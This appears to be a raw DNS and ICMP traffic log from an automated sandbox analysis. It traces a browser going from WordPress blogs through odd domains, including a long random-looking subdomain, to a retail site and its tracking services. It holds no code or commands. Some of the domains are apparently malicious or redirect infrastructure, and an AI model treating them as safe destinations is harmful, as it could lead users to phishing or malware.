                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:24.611610889 CET6006653192.168.2.161.1.1.1
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:24.619750023 CET53600661.1.1.1192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:24.619785070 CET53510931.1.1.1192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:24.623482943 CET5513753192.168.2.161.1.1.1
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:24.623672009 CET5717953192.168.2.161.1.1.1
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:24.624247074 CET5976653192.168.2.161.1.1.1
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:24.624382973 CET4992053192.168.2.161.1.1.1
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:24.631707907 CET53551371.1.1.1192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:24.632371902 CET53597661.1.1.1192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:24.634248018 CET53499201.1.1.1192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:24.651495934 CET53571791.1.1.1192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:25.270169020 CET6168653192.168.2.161.1.1.1
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:25.270385981 CET5474353192.168.2.161.1.1.1
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:25.383032084 CET5328253192.168.2.161.1.1.1
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:25.383181095 CET5141253192.168.2.161.1.1.1
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:25.890527010 CET6257553192.168.2.161.1.1.1
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:25.890691042 CET5859453192.168.2.161.1.1.1
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:25.899822950 CET53585941.1.1.1192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:25.900408983 CET53625751.1.1.1192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:26.742594957 CET6171253192.168.2.161.1.1.1
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:26.742729902 CET5770153192.168.2.161.1.1.1
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:29.152153969 CET5206953192.168.2.161.1.1.1
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:29.152344942 CET6536353192.168.2.161.1.1.1
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:29.673439026 CET5463653192.168.2.161.1.1.1
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:29.673825026 CET5822253192.168.2.161.1.1.1
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:30.157107115 CET5185153192.168.2.161.1.1.1
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:30.157279015 CET5647853192.168.2.161.1.1.1
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:30.165421009 CET53564781.1.1.1192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:31.251452923 CET53517791.1.1.1192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:33.685523987 CET53526581.1.1.1192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:34.996536016 CET5361653192.168.2.161.1.1.1
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:34.996699095 CET5046053192.168.2.161.1.1.1
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:35.004482031 CET53536161.1.1.1192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:35.004499912 CET53504601.1.1.1192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:35.086360931 CET6004253192.168.2.161.1.1.1
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:35.086549997 CET6151153192.168.2.161.1.1.1
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:35.095272064 CET53615111.1.1.1192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:35.096103907 CET53600421.1.1.1192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:35.880717993 CET5473753192.168.2.161.1.1.1
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:35.880917072 CET5905353192.168.2.161.1.1.1
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:35.888458014 CET53547371.1.1.1192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:35.888916016 CET53590531.1.1.1192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:36.066431046 CET5845653192.168.2.161.1.1.1
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:36.066617012 CET5298653192.168.2.161.1.1.1
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:36.074285030 CET53584561.1.1.1192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:36.074696064 CET53529861.1.1.1192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:36.715984106 CET5631253192.168.2.161.1.1.1
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:36.718031883 CET6251153192.168.2.161.1.1.1
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:36.725994110 CET53625111.1.1.1192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:36.815618992 CET5644653192.168.2.161.1.1.1
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:36.815776110 CET5589953192.168.2.161.1.1.1
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:36.823297024 CET53558991.1.1.1192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:36.823311090 CET53564461.1.1.1192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:39.292972088 CET53555141.1.1.1192.168.2.16
                                                                                                                                                                                                                                                                  TimestampSource IPDest IPChecksumCodeType
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:42.345177889 CET192.168.2.161.1.1.1c23b(Port unreachable)Destination Unreachable
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:56.343204021 CET192.168.2.161.1.1.1c287(Port unreachable)Destination Unreachable
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:24.651577950 CET192.168.2.161.1.1.1c2b8(Port unreachable)Destination Unreachable
                                                                                                                                                                                                                                                                  TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:40.286384106 CET192.168.2.161.1.1.10x7990Standard query (0)dartergary.wordpress.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:40.286537886 CET192.168.2.161.1.1.10x27fStandard query (0)dartergary.wordpress.com65IN (0x0001)false
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:41.162343979 CET192.168.2.161.1.1.10x479fStandard query (0)s0.wp.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:41.162594080 CET192.168.2.161.1.1.10x8309Standard query (0)s0.wp.com65IN (0x0001)false
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:41.177406073 CET192.168.2.161.1.1.10x115Standard query (0)s1.wp.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:41.177582979 CET192.168.2.161.1.1.10x1d55Standard query (0)s1.wp.com65IN (0x0001)false
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:41.178042889 CET192.168.2.161.1.1.10x172fStandard query (0)s2.wp.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:41.178200006 CET192.168.2.161.1.1.10xc600Standard query (0)s2.wp.com65IN (0x0001)false
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:41.531177998 CET192.168.2.161.1.1.10xefb0Standard query (0)fqr44.wordpress.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:41.531177998 CET192.168.2.161.1.1.10xd6adStandard query (0)fqr44.wordpress.com65IN (0x0001)false
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:41.531452894 CET192.168.2.161.1.1.10x2624Standard query (0)0.gravatar.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:41.531574011 CET192.168.2.161.1.1.10xc033Standard query (0)0.gravatar.com65IN (0x0001)false
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:42.312211990 CET192.168.2.161.1.1.10xebc2Standard query (0)fqr44.wordpress.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:42.312347889 CET192.168.2.161.1.1.10xadb2Standard query (0)fqr44.wordpress.com65IN (0x0001)false
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:42.343025923 CET192.168.2.161.1.1.10x3db3Standard query (0)s0.wp.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:42.343175888 CET192.168.2.161.1.1.10xdb24Standard query (0)s0.wp.com65IN (0x0001)false
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:42.346982002 CET192.168.2.161.1.1.10xa622Standard query (0)stats.wp.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:42.347131014 CET192.168.2.161.1.1.10x6832Standard query (0)stats.wp.com65IN (0x0001)false
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:42.360510111 CET192.168.2.161.1.1.10xa5bcStandard query (0)fonts.wp.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:42.360646963 CET192.168.2.161.1.1.10x31feStandard query (0)fonts.wp.com65IN (0x0001)false
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:42.408469915 CET192.168.2.161.1.1.10x2187Standard query (0)0.gravatar.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:42.408632040 CET192.168.2.161.1.1.10x6741Standard query (0)0.gravatar.com65IN (0x0001)false
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:43.054516077 CET192.168.2.161.1.1.10xde21Standard query (0)s2.wp.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:43.054662943 CET192.168.2.161.1.1.10x6162Standard query (0)s2.wp.com65IN (0x0001)false
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:43.089080095 CET192.168.2.161.1.1.10x75fStandard query (0)s1.wp.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:43.089339972 CET192.168.2.161.1.1.10x3ceStandard query (0)s1.wp.com65IN (0x0001)false
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:43.203504086 CET192.168.2.161.1.1.10x1f70Standard query (0)stats.wp.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:43.203649998 CET192.168.2.161.1.1.10x9a99Standard query (0)stats.wp.com65IN (0x0001)false
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:43.212090969 CET192.168.2.161.1.1.10x4678Standard query (0)pixel.wp.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:43.212269068 CET192.168.2.161.1.1.10x9f5dStandard query (0)pixel.wp.com65IN (0x0001)false
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:44.030293941 CET192.168.2.161.1.1.10x18a0Standard query (0)pixel.wp.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:44.030473948 CET192.168.2.161.1.1.10x4c4Standard query (0)pixel.wp.com65IN (0x0001)false
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:44.245495081 CET192.168.2.161.1.1.10x678aStandard query (0)www.google.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:44.245784998 CET192.168.2.161.1.1.10xaf51Standard query (0)www.google.com65IN (0x0001)false
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:55.934137106 CET192.168.2.161.1.1.10x6ac0Standard query (0)usqe.bin4tgla.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:55.934288979 CET192.168.2.161.1.1.10x1674Standard query (0)usqe.bin4tgla.com65IN (0x0001)false
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:57.111865997 CET192.168.2.161.1.1.10x647bStandard query (0)code.jquery.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:57.112010956 CET192.168.2.161.1.1.10x2788Standard query (0)code.jquery.com65IN (0x0001)false
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:57.112271070 CET192.168.2.161.1.1.10x270aStandard query (0)www.google.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:57.112700939 CET192.168.2.161.1.1.10xba35Standard query (0)www.google.com65IN (0x0001)false
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:58.283071995 CET192.168.2.161.1.1.10x2d8bStandard query (0)www.google.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:58.283246994 CET192.168.2.161.1.1.10x2360Standard query (0)www.google.com65IN (0x0001)false
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:58.511486053 CET192.168.2.161.1.1.10xc68dStandard query (0)code.jquery.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:58.511756897 CET192.168.2.161.1.1.10x65f1Standard query (0)code.jquery.com65IN (0x0001)false
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:02.443931103 CET192.168.2.161.1.1.10xbc1eStandard query (0)www.google.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:02.444130898 CET192.168.2.161.1.1.10xf22fStandard query (0)www.google.com65IN (0x0001)false
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:02.490668058 CET192.168.2.161.1.1.10xc72dStandard query (0)a.nel.cloudflare.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:02.490834951 CET192.168.2.161.1.1.10x3cdbStandard query (0)a.nel.cloudflare.com65IN (0x0001)false
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:59.557523966 CET192.168.2.161.1.1.10x81d1Standard query (0)www.google.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:59.557714939 CET192.168.2.161.1.1.10xba3bStandard query (0)www.google.com65IN (0x0001)false
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:03.590739965 CET192.168.2.161.1.1.10x2748Standard query (0)www.google.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:03.590898991 CET192.168.2.161.1.1.10xd3aaStandard query (0)www.google.com65IN (0x0001)false
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:14.345390081 CET192.168.2.161.1.1.10xa2dbStandard query (0)hib4k6i4e0wuyxupagrlur637pll4b5cys71i1hba1alaqpyfije.unimpociarp.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:14.345601082 CET192.168.2.161.1.1.10xc323Standard query (0)hib4k6i4e0wuyxupagrlur637pll4b5cys71i1hba1alaqpyfije.unimpociarp.com65IN (0x0001)false
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:16.512983084 CET192.168.2.161.1.1.10xeed1Standard query (0)hib4k6i4e0wuyxupagrlur637pll4b5cys71i1hba1alaqpyfije.unimpociarp.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:16.513144970 CET192.168.2.161.1.1.10x472cStandard query (0)hib4k6i4e0wuyxupagrlur637pll4b5cys71i1hba1alaqpyfije.unimpociarp.com65IN (0x0001)false
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:16.513401985 CET192.168.2.161.1.1.10x7876Standard query (0)www.asos.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:16.513510942 CET192.168.2.161.1.1.10xfc88Standard query (0)www.asos.com65IN (0x0001)false
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:18.090084076 CET192.168.2.161.1.1.10xb3c3Standard query (0)content.asos-media.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:18.090390921 CET192.168.2.161.1.1.10x2f53Standard query (0)content.asos-media.com65IN (0x0001)false
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:18.090708971 CET192.168.2.161.1.1.10x694dStandard query (0)images.asos-media.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:18.090847015 CET192.168.2.161.1.1.10x7416Standard query (0)images.asos-media.com65IN (0x0001)false
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:18.091206074 CET192.168.2.161.1.1.10xd9d8Standard query (0)www.asos-video.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:18.091418982 CET192.168.2.161.1.1.10x7d4dStandard query (0)www.asos-video.com65IN (0x0001)false
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:18.098115921 CET192.168.2.161.1.1.10xcce2Standard query (0)assets.asosservices.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:18.098264933 CET192.168.2.161.1.1.10x2689Standard query (0)assets.asosservices.com65IN (0x0001)false
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:18.103173018 CET192.168.2.161.1.1.10xd8f8Standard query (0)cdn.optimizely.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:18.103310108 CET192.168.2.161.1.1.10x3ab6Standard query (0)cdn.optimizely.com65IN (0x0001)false
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:18.105642080 CET192.168.2.161.1.1.10xd88fStandard query (0)my.asos.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:18.105777979 CET192.168.2.161.1.1.10x988bStandard query (0)my.asos.com65IN (0x0001)false
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:18.108959913 CET192.168.2.161.1.1.10x18e7Standard query (0)ci.asosservices.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:18.109128952 CET192.168.2.161.1.1.10x8b78Standard query (0)ci.asosservices.com65IN (0x0001)false
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:18.113384008 CET192.168.2.161.1.1.10xc189Standard query (0)res.cloudinary.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:18.113622904 CET192.168.2.161.1.1.10x787eStandard query (0)res.cloudinary.com65IN (0x0001)false
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:19.218211889 CET192.168.2.161.1.1.10x7ecbStandard query (0)assets.asosservices.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:19.218400002 CET192.168.2.161.1.1.10xbc1fStandard query (0)assets.asosservices.com65IN (0x0001)false
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:20.179140091 CET192.168.2.161.1.1.10x1fc8Standard query (0)s2.go-mpulse.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:20.179284096 CET192.168.2.161.1.1.10xf05aStandard query (0)s2.go-mpulse.net65IN (0x0001)false
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:22.408756018 CET192.168.2.161.1.1.10x9e24Standard query (0)ci.asosservices.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:22.408900976 CET192.168.2.161.1.1.10xa955Standard query (0)ci.asosservices.com65IN (0x0001)false
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:22.415436029 CET192.168.2.161.1.1.10x83f8Standard query (0)dpm.demdex.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:22.415591955 CET192.168.2.161.1.1.10x2c62Standard query (0)dpm.demdex.net65IN (0x0001)false
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:22.672075033 CET192.168.2.161.1.1.10xa09cStandard query (0)s2.go-mpulse.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:22.672224045 CET192.168.2.161.1.1.10x277cStandard query (0)s2.go-mpulse.net65IN (0x0001)false
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:22.687611103 CET192.168.2.161.1.1.10x84d4Standard query (0)c.go-mpulse.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:22.687875986 CET192.168.2.161.1.1.10x5ec8Standard query (0)c.go-mpulse.net65IN (0x0001)false
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:23.797816992 CET192.168.2.161.1.1.10xcebStandard query (0)creativeassets.asosservices.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:23.798037052 CET192.168.2.161.1.1.10x6ad6Standard query (0)creativeassets.asosservices.com65IN (0x0001)false
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:23.818875074 CET192.168.2.161.1.1.10xec96Standard query (0)c.go-mpulse.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:23.819027901 CET192.168.2.161.1.1.10x51f9Standard query (0)c.go-mpulse.net65IN (0x0001)false
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:24.262459040 CET192.168.2.161.1.1.10x1636Standard query (0)resources.asosservices.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:24.262731075 CET192.168.2.161.1.1.10x9545Standard query (0)resources.asosservices.com65IN (0x0001)false
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:24.611432076 CET192.168.2.161.1.1.10x1362Standard query (0)dpm.demdex.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:24.611610889 CET192.168.2.161.1.1.10x7647Standard query (0)dpm.demdex.net65IN (0x0001)false
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:24.623482943 CET192.168.2.161.1.1.10xeee0Standard query (0)asos.demdex.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:24.623672009 CET192.168.2.161.1.1.10x6f35Standard query (0)asos.demdex.net65IN (0x0001)false
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:24.624247074 CET192.168.2.161.1.1.10x7d92Standard query (0)metrics.asos.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:24.624382973 CET192.168.2.161.1.1.10x18b3Standard query (0)metrics.asos.com65IN (0x0001)false
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:25.270169020 CET192.168.2.161.1.1.10x9d71Standard query (0)creativeassets.asosservices.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:25.270385981 CET192.168.2.161.1.1.10x8f32Standard query (0)creativeassets.asosservices.com65IN (0x0001)false
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:25.383032084 CET192.168.2.161.1.1.10x1ce2Standard query (0)resources.asosservices.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:25.383181095 CET192.168.2.161.1.1.10x1e37Standard query (0)resources.asosservices.com65IN (0x0001)false
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:25.890527010 CET192.168.2.161.1.1.10xc0b8Standard query (0)metrics.asos.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:25.890691042 CET192.168.2.161.1.1.10x4340Standard query (0)metrics.asos.com65IN (0x0001)false
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:26.742594957 CET192.168.2.161.1.1.10xc2deStandard query (0)www.asos.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:26.742729902 CET192.168.2.161.1.1.10x5e2Standard query (0)www.asos.com65IN (0x0001)false
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:29.152153969 CET192.168.2.161.1.1.10xf62aStandard query (0)reporting.go-mpulse.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:29.152344942 CET192.168.2.161.1.1.10x2891Standard query (0)reporting.go-mpulse.net65IN (0x0001)false
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:29.673439026 CET192.168.2.161.1.1.10x5262Standard query (0)www.asosglobal.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:29.673825026 CET192.168.2.161.1.1.10x83b0Standard query (0)www.asosglobal.com65IN (0x0001)false
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:30.157107115 CET192.168.2.161.1.1.10x4107Standard query (0)cm.everesttech.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:30.157279015 CET192.168.2.161.1.1.10xd112Standard query (0)cm.everesttech.net65IN (0x0001)false
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:34.996536016 CET192.168.2.161.1.1.10x5de3Standard query (0)cdn.optimizely.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:34.996699095 CET192.168.2.161.1.1.10xda6eStandard query (0)cdn.optimizely.com65IN (0x0001)false
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:35.086360931 CET192.168.2.161.1.1.10x6613Standard query (0)a19065870423.cdn.optimizely.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:35.086549997 CET192.168.2.161.1.1.10x9ba4Standard query (0)a19065870423.cdn.optimizely.com65IN (0x0001)false
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:35.880717993 CET192.168.2.161.1.1.10xd908Standard query (0)static.cloudflareinsights.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:35.880917072 CET192.168.2.161.1.1.10xf9eeStandard query (0)static.cloudflareinsights.com65IN (0x0001)false
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:36.066431046 CET192.168.2.161.1.1.10x5607Standard query (0)logx.optimizely.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:36.066617012 CET192.168.2.161.1.1.10xb1c9Standard query (0)logx.optimizely.com65IN (0x0001)false
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:36.715984106 CET192.168.2.161.1.1.10x2ef4Standard query (0)images.asos-media.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:36.718031883 CET192.168.2.161.1.1.10x6782Standard query (0)images.asos-media.com65IN (0x0001)false
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:36.815618992 CET192.168.2.161.1.1.10xe1aStandard query (0)static.cloudflareinsights.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:36.815776110 CET192.168.2.161.1.1.10x1fd3Standard query (0)static.cloudflareinsights.com65IN (0x0001)false
                                                                                                                                                                                                                                                                  TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:40.297902107 CET1.1.1.1192.168.2.160x27fNo error (0)dartergary.wordpress.comlb.wordpress.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:40.297930956 CET1.1.1.1192.168.2.160x7990No error (0)dartergary.wordpress.comlb.wordpress.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:40.297930956 CET1.1.1.1192.168.2.160x7990No error (0)lb.wordpress.com192.0.78.12A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:40.297930956 CET1.1.1.1192.168.2.160x7990No error (0)lb.wordpress.com192.0.78.13A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:41.169984102 CET1.1.1.1192.168.2.160x479fNo error (0)s0.wp.com192.0.77.32A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:41.186285973 CET1.1.1.1192.168.2.160x115No error (0)s1.wp.com192.0.77.32A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:41.186724901 CET1.1.1.1192.168.2.160x172fNo error (0)s2.wp.com192.0.77.32A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:41.540298939 CET1.1.1.1192.168.2.160x2624No error (0)0.gravatar.com192.0.73.2A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:41.558465958 CET1.1.1.1192.168.2.160xefb0No error (0)fqr44.wordpress.comlb.wordpress.comCNAME (Canonical name)IN (0x0001)false
